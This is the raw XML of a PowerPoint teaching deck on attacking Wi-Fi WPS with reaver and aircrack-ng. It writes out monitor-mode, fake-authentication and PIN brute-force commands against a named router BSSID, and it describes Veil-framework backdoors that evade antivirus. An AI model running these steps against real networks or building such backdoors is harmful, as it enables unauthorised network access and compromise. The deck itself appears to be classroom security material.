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0"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId21"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="370" r:id="rId3"/>
    <p:sldId id="371" r:id="rId4"/>
    <p:sldId id="372" r:id="rId5"/>
    <p:sldId id="373" r:id="rId6"/>
    <p:sldId id="374" r:id="rId7"/>
    <p:sldId id="362" r:id="rId8"/>
    <p:sldId id="360" r:id="rId9"/>
    <p:sldId id="361" r:id="rId10"/>
    <p:sldId id="363" r:id="rId11"/>
    <p:sldId id="352" r:id="rId12"/>
    <p:sldId id="353" r:id="rId13"/>
    <p:sldId id="368" r:id="rId14"/>
    <p:sldId id="364" r:id="rId15"/>
    <p:sldId id="365" r:id="rId16"/>
    <p:sldId id="366" r:id="rId17"/>
    <p:sldId id="367" r:id="rId18"/>
    <p:sldId id="369" r:id="rId19"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Dosis" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId22"/>
      <p:bold r:id="rId23"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId24"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Sniglet" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId25"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Adobe Devanagari" panose="02040503050201020203" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId26"/>
      <p:bold r:id="rId27"/>
      <p:italic r:id="rId28"/>
      <p:boldItalic r:id="rId29"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>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97" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="145" d="100"/>
          <a:sy n="145" d="100"/>
        </p:scale>
        <p:origin x="114" y="426"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>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mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>wpscrack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>wpscrack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dropbox\Public\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>forTeaching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\hacking\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reaver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> https://www.dropbox.com/s/onjf1wbn9fnbwvz/reaver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94835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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> +x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reaver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165489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85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airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng stop wlan0mon //optional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng start wlan0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng wlan0mon  //find channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>wash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> wlan0mon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airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 48:5D:36:06:CF:C8 --channel 11  wlan0mon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-ng --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fakeauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 30 -a 48:5D:36:06:CF:C8 -h 9C:EF:D5:FE:2E:F3 wlan0mon  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reaver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 48:5D:36:06:CF:C8 --channel 11 --interface wlan0mon -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --no-associate --no-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Run the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command 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the end.</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Actually when you brute force pin and pin is wrong, then ideally AP should send NACK (not acknowledged) packet to the device telling him that pin was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>incorrect.But</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> ,some poor WPS implementations will drop a connection on the floor when an invalid pin is supplied instead of responding with a NACK message as the specs dictate. </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Thus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keeps on waiting for these NACK packet and ultimately timeout occurs (the max. time which AP should wait for NACK). Then it tries same pin again and process goes on and on...</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won't wait for these packets and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>cappy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> on his work by attempting new pin.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29873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982980" y="1161050"/>
            <a:ext cx="7475120" cy="1159800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Using veil-framework to Create a Backdoor</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file</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5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="950258" y="1366712"/>
            <a:ext cx="6194480" cy="2313748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235114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Router Setting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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0" y="4852988"/>
            <a:ext cx="549275" cy="290512"/>
          </a:xfrm>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66596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9408" y="278091"/>
            <a:ext cx="7562679" cy="4299665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207505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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="859836" y="0"/>
            <a:ext cx="7424328" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264951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Brute force password</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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4722813"/>
            <a:ext cx="549275" cy="393700"/>
          </a:xfrm>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20261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2910" y="0"/>
            <a:ext cx="6538180" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256868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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1603057" y="0"/>
            <a:ext cx="5937885" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261896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stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="855164" y="0"/>
            <a:ext cx="7433671" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209590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Attack failed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747925" y="1302837"/>
            <a:ext cx="6140400" cy="1158423"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>My WPS version is 2.0. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only version 1.0 will work</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nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="38222" r="45554" b="48889"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="843761" y="2620712"/>
            <a:ext cx="7471976" cy="1532188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2184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a:xfrm>
            <a:off x="747924" y="1302837"/>
            <a:ext cx="6790941" cy="3610800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Veil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tool designed to generate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(backdoor) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that bypass common anti-virus solutions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>handles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the incoming connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reverse http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>acts as client. Not the attack. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>connect to me (attacker) to void anti-virus detection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7745776" y="1225125"/>
            <a:ext cx="533474" cy="2495898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5256155" y="2914239"/>
            <a:ext cx="2440593" cy="1939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4404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445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6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19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007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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A misconfiguration problem </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381666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download</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586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91087" y="1360031"/>
            <a:ext cx="7020905" cy="1981477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248563312"/>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171</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>41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Dosis</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Bahnschrift Light Condensed</vt:lpstr>
      <vt:lpstr>Sniglet</vt:lpstr>
      <vt:lpstr>Adobe Devanagari</vt:lpstr>
      <vt:lpstr>Brush Script MT</vt:lpstr>
      <vt:lpstr>Friar template</vt:lpstr>
      <vt:lpstr>Using veil-framework to Create a Backdoor</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>File download</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Verify file</vt:lpstr>
      <vt:lpstr>Router Setting</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Brute force password</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Attack failed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127</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-27T15:56:22Z</dcterms:modified>
</cp:coreProperties>
</file>